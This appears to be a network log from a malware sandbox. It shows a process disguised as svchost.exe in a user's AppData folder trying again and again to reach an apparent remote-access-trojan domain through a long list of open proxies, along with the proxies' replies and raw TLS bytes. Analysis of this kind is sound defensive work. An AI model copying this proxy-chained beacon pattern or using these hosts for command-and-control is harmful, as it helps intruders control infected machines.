Mar 9, 2024 13:14:38.378307104 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2268	192.168.2.5	56070	85.172.15.98	8083	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.522849083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.380223036 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.941323042 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2269	192.168.2.5	57206	157.185.157.151	26589	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.528768063 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2270	192.168.2.5	57065	103.190.54.141	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.529058933 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.905558109 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2271	192.168.2.5	57132	41.77.188.131	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.534022093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.205785990 CET	536	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:31 GMT Server: Apache X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=63072000; includeSubDomains; preload X-Content-Type-Options: nosniff Content-Length: 597 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was una
Mar 9, 2024 13:14:31.205987930 CET	372	IN	Data Raw: 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 Data Ascii: ble to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this erro

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2272	192.168.2.5	57130	222.220.102.159	8000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.563122988 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.951611996 CET	536	IN	HTTP/1.1 500 Internal Server Error Server: openresty Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 576 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page --><!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2273	192.168.2.5	57224	5.161.231.34	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.564673901 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.820349932 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2274	192.168.2.5	57231	162.240.22.184	48026	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.565213919 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.145818949 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.833669901 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.146142960 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.536746979 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.833736897 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2275	192.168.2.5	57286	104.19.120.84	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.592411995 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.748123884 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2276	192.168.2.5	57301	172.67.182.77	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.599977016 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.755772114 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2277	192.168.2.5	57149	116.199.168.1	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.601289988 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2278	192.168.2.5	57200	107.181.148.227	6087	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.603025913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.896173954 CET	459	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization." Proxy-Connection: close X-Webshare-Error: 407 X-Webshare-Reason: invalidpassword Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Length: 121 Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2279	192.168.2.5	57323	104.25.194.175	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.611287117 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.765674114 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2280	192.168.2.5	57195	136.243.82.121	1082	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.619343042 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.004199028 CET	84	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:29 GMT Transfer-Encoding: chunked

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2281	192.168.2.5	57193	213.202.230.241	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.621320009 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.940265894 CET	76	IN	HTTP/1.0 200 Connection Established Proxy-agent: Apache/2.4.52 (Ubuntu)
Mar 9, 2024 13:14:29.940764904 CET	369	OUT	Data Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ec 52 a4 d7 d9 9d 94 75 1f 7c 4f ef 4c 2f 26 72 58 e5 11 5d f5 e1 e7 e3 21 46 83 d8 6c 1d 17 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: lheRu\|OL/&rX]!Fl*,+0/$#('=<5/artemis-rat.com#4M;paT?&\19~mhvlPH,
Mar 9, 2024 13:14:30.259495974 CET	1286	IN	Data Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ec 52 a6 27 b0 29 91 82 ce 95 20 e6 d1 9b 70 8e 5f 9a 01 a5 48 1c 30 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00 Data Ascii: C?eR') p_H0DOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
Mar 9, 2024 13:14:30.259504080 CET	162	IN	Data Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7 Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5
Mar 9, 2024 13:14:30.259610891 CET	1286	IN	Data Raw: 7c f0 30 c1 81 dd bd 46 3c 84 41 91 c0 f9 72 70 be e9 27 7e 00 05 90 30 82 05 8c 30 82 03 74 a0 03 02 01 02 02 0d 02 03 bc 50 a3 27 53 f0 91 80 22 ed f1 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 47 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 Data Ascii: \|0F<Arp'~00tP'S"0*H0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R10200813000042Z270930000042Z0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P5
Mar 9, 2024 13:14:30.259740114 CET	1286	IN	Data Raw: 67 99 90 77 37 0a 97 2d c5 1c 1e f4 d0 5b e9 15 e3 ea 02 09 c8 13 d7 13 70 65 bf fb 88 9b 5a 25 be 77 09 e1 a7 6a 4e 11 75 b9 1e 4d f1 00 1b 6a 66 79 8e c3 6e d8 6d a2 22 a2 6d 05 fb 2c f2 f1 50 e5 a0 d1 d8 9f 35 7d fc 70 ab 59 2a 02 f1 be b0 d3 Data Ascii: gw7-[peZ%wjNuMjfynm"m,P5}pYj%[ @4 awHI)adcGF9sO+Xe Uon=zcmf0b0Jwl6!X0H0W10UBE10UGlobalS
Mar 9, 2024 13:14:30.259937048 CET	574	IN	Data Raw: 82 01 01 00 34 a4 1e b1 28 a3 d0 b4 76 17 a6 31 7a 21 e9 d1 52 3e c8 db 74 16 41 88 b8 3d 35 1d ed e4 ff 93 e1 5c 5f ab bb ea 7c cf db e4 0d d1 8b 57 f2 26 6f 5b be 17 46 68 94 37 6f 6b 7a c8 c0 18 37 fa 25 51 ac ec 68 bf b2 c8 49 fd 5a 9a ca 01 Data Ascii: 4(v1z!R>tA=5\_\|W&o[Fh7okz7%QhIZ#+IjuXHW5oo*Ni-h+s"7fIUg2&p=gm=\|42njoK;7D~lF!fUl)f[wIH(3rS5b$
Mar 9, 2024 13:14:30.261945009 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 4a 25 fb 95 b7 3b a7 06 21 70 99 3f e7 c1 51 ea 99 99 a3 d9 18 64 bd d8 b3 a1 9f 4e b3 3f 03 0b 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 92 44 16 3c 92 d2 a0 36 b3 9e 54 4e 84 d9 8f da cb cb da a3 2b Data Ascii: %! J%;!p?QdN?(D<6TN+@
Mar 9, 2024 13:14:30.580472946 CET	258	IN	Data Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 20 00 c0 ef f1 5c 83 12 d8 e4 38 e5 74 fc a1 e4 f1 c9 5b 71 3b 37 0c a2 e2 39 6b 8e af 67 af bb d9 ad 46 90 9c e5 fb d7 a2 4b f5 e0 bf d4 ea 04 8f 4c 93 9c 24 c7 17 d1 b1 22 63 a4 9e 7b 8d b9 00 ec 9f 2a 26 e4 Data Ascii: \8t[q;79kgFKL$"c{*&?BG:Ops<eM^&J>DgN'QdZ9}->7pk!Q)vh=:A(5W,]E EbZ7p[`y(1s<{#3
Mar 9, 2024 13:14:30.644458055 CET	252	OUT	Data Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 88 28 81 72 39 5e b7 fa 46 a7 d7 6b 9b 67 68 4e d2 e3 09 28 a1 74 bf 4d 22 b1 8f 1a 31 12 d4 fb ff 31 d5 7e 85 d1 d4 61 f4 f1 e4 1f b3 a4 8e e1 60 c8 9c 4a 20 e1 fa e4 40 de 80 9f 2b b0 eb ae ab 11 73 18 35 Data Ascii: (r9^FkghN(tM"11~a`J @+s52;B'pTd]UORVm.(`x4mh*lpRs$Cx'qg-JRjL69;y#yc[HrAe`bN<YMx?!r.Pah?TbS0;w
Mar 9, 2024 13:14:30.964256048 CET	1286	IN	Data Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 02 02 2d 1a b3 2e 8d 64 ea 43 72 68 d7 2e be e6 71 71 4e 75 89 1d 14 95 cb 5c 78 ff e6 83 e8 92 c0 92 dc df cc d7 ca 9a 2e bd 68 d5 72 12 6c 67 0e 15 3f a7 15 c0 d9 22 c4 c1 34 58 6d 92 79 77 17 51 61 6b d4 Data Ascii: q-.dCrh.qqNu\x.hrlg?"4XmywQakJk>@iB'Fa4ZiV.O>"3y@A=CX@b94zCo>p!C+^ Q,'25kIw?3d6qo9l1iq"Qm93

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2282	192.168.2.5	57225	45.43.81.164	5811	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.626682043 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.914021969 CET	459	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization." Proxy-Connection: close X-Webshare-Error: 407 X-Webshare-Reason: invalidpassword Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Length: 121 Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2283	192.168.2.5	57198	118.218.126.54	9400	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.628717899 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.945241928 CET	1286	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Server: Zscaler/6.2 Cache-Control: no-cache Access-Control-Allow-Origin: * Content-length: 13597 Data Raw: 3c 21 2d 2d 23 20 49 64 3a 20 63 6c 6f 73 65 64 70 72 6f 78 79 2e 68 74 6d 6c 20 32 38 35 31 34 34 20 32 30 32 31 2d 30 36 2d 31 36 20 30 35 3a 30 32 3a 30 36 5a 20 73 7a 68 61 6e 67 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 63 2e 6f 72 67 2f 54 52 2f 31 39 39 39 2f 52 45 43 2d 68 74 6d 6c 34 30 31 2d 31 39 39 39 31 32 32 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 73 63 61 6c 65 72 20 6d 61 6b 65 73 20 74 68 65 20 69 6e 74 65 72 6e 65 74 20 73 61 66 65 20 66 6f 72 20 62 75 73 